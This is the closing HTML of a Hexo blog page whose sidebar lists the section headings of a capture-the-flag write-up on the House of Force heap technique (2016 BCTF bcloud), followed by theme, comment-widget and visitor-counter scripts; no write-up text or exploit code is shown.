        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x00-House-of-Force"><span class="nav-number">1.</span> <span class="nav-text">0x00 House of Force</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2016-BCTF-bcloud"><span class="nav-number">2.</span> <span class="nav-text">2016-BCTF-bcloud</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-序及利用分析"><span class="nav-number">3.</span> <span class="nav-text">0x02 序及利用分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-泄露堆指针"><span class="nav-number">3.1.</span> <span class="nav-text">1.泄露堆指针</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-修改topchunk的大小为0xffffffff"><span class="nav-number">3.2.</span> <span class="nav-text">2.修改topchunk的大小为0xffffffff</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-申请正确大小的内存，修改topchun的指针到0x804b118"><span class="nav-number">3.3.</span> <span class="nav-text">3.申请正确大小的内存，修改topchun的指针到0x804b118</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#glibc会对申请的内存大小进行调整"><span class="nav-number">3.3.1.</span> <span class="nav-text">glibc会对申请的内存大小进行调整</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-泄露libc中函数的地址"><span class="nav-number">3.4.</span> <span class="nav-text">4.泄露libc中函数的地址</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-计算system的地址"><span class="nav-number">3.5.</span> <span class="nav-text">5.计算system的地址</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-总结"><span class="nav-number">4.</span> <span class="nav-text">0x03 总结</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-EXP"><span class="nav-number">5.</span> <span class="nav-text">0x04 EXP</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Po1lux</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: '18YVWKzBgzb7zbj1Fmt6ipCC-gzGzoHsz',
        appKey: 'mPl8Laz5VD56ciWT9PwYKa8n',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("18YVWKzBgzb7zbj1Fmt6ipCC-gzGzoHsz", "mPl8Laz5VD56ciWT9PwYKa8n");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
